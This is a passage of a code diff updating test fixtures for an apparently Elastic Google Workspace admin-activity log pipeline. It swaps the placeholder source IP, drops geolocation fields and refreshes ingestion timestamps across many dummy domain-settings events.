"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_PASSWORD_MAX_LENGTH\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_PASSWORD_MAX_LENGTH", "id": "1", @@ -5177,7 +4043,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -5201,35 +4067,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091428500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_PASSWORD_MIN_LENGTH\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:31.916087900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_PASSWORD_MIN_LENGTH\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_PASSWORD_MIN_LENGTH", "id": "1", @@ -5259,7 +4107,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -5283,35 +4131,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091431100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"UPDATE_DOMAIN_PRIMARY_ADMIN_EMAIL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:31.916092400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"UPDATE_DOMAIN_PRIMARY_ADMIN_EMAIL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "UPDATE_DOMAIN_PRIMARY_ADMIN_EMAIL", "id": "1", @@ -5341,7 +4171,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -5365,35 +4195,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091434Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ENABLE_SERVICE_OR_FEATURE_NOTIFICATIONS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:31.916096300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ENABLE_SERVICE_OR_FEATURE_NOTIFICATIONS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "ENABLE_SERVICE_OR_FEATURE_NOTIFICATIONS", "id": "1", @@ -5424,7 +4236,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -5448,35 +4260,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091436900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_APPLICATION\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"appid\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"}]}}", + "ingested": "2021-12-09T13:38:31.916101200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_APPLICATION\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"appid\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"}]}}", "provider": "admin", "action": "REMOVE_APPLICATION", "id": "1", @@ -5506,7 +4300,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -5530,35 +4324,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091453500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_APPLICATION_FROM_WHITELIST\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"appid\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"}]}}", + "ingested": "2021-12-09T13:38:31.916105800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_APPLICATION_FROM_WHITELIST\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"appid\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"}]}}", "provider": "admin", "action": "REMOVE_APPLICATION_FROM_WHITELIST", "id": "1", @@ -5588,7 +4364,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -5612,35 +4388,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091458700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_RENEW_DOMAIN_REGISTRATION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:31.916110700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_RENEW_DOMAIN_REGISTRATION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_RENEW_DOMAIN_REGISTRATION", "id": "1", @@ -5670,7 +4428,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -5692,35 +4450,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091461600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_RESELLER_ACCESS\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:31.916116600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_RESELLER_ACCESS\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_RESELLER_ACCESS", "id": "1", @@ -5750,7 +4490,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -5774,35 +4514,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091464400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"RULE_ACTIONS_CHANGED\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", + "ingested": "2021-12-09T13:38:31.916121900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"RULE_ACTIONS_CHANGED\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", "provider": "admin", "action": "RULE_ACTIONS_CHANGED", "id": "1", @@ -5832,7 +4554,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -5856,35 +4578,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091467200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CREATE_RULE\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", + "ingested": "2021-12-09T13:38:31.916125600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CREATE_RULE\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", "provider": "admin", "action": "CREATE_RULE", "id": "1", @@ -5914,7 +4618,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -5938,35 +4642,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091470100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_RULE_CRITERIA\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", + "ingested": "2021-12-09T13:38:31.916130200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_RULE_CRITERIA\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", "provider": "admin", "action": "CHANGE_RULE_CRITERIA", "id": "1", @@ -5996,7 +4682,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -6020,35 +4706,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091472800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"DELETE_RULE\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", + "ingested": "2021-12-09T13:38:31.916136100Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"DELETE_RULE\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", "provider": "admin", "action": "DELETE_RULE", "id": "1", @@ -6078,7 +4746,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -6100,35 +4768,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091475800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"RENAME_RULE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:31.916142300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"RENAME_RULE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "RENAME_RULE", "id": "1", @@ -6158,7 +4808,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -6180,35 +4830,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091478900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"RULE_STATUS_CHANGED\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", + "ingested": "2021-12-09T13:38:31.916146500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"RULE_STATUS_CHANGED\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", "provider": "admin", "action": "RULE_STATUS_CHANGED", "id": "1", @@ -6238,7 +4870,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -6262,35 +4894,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091481500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_SECONDARY_DOMAIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}", + "ingested": "2021-12-09T13:38:31.916151300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_SECONDARY_DOMAIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}", "provider": "admin", "action": "ADD_SECONDARY_DOMAIN", "id": "1", @@ -6320,7 +4934,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -6344,35 +4958,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": 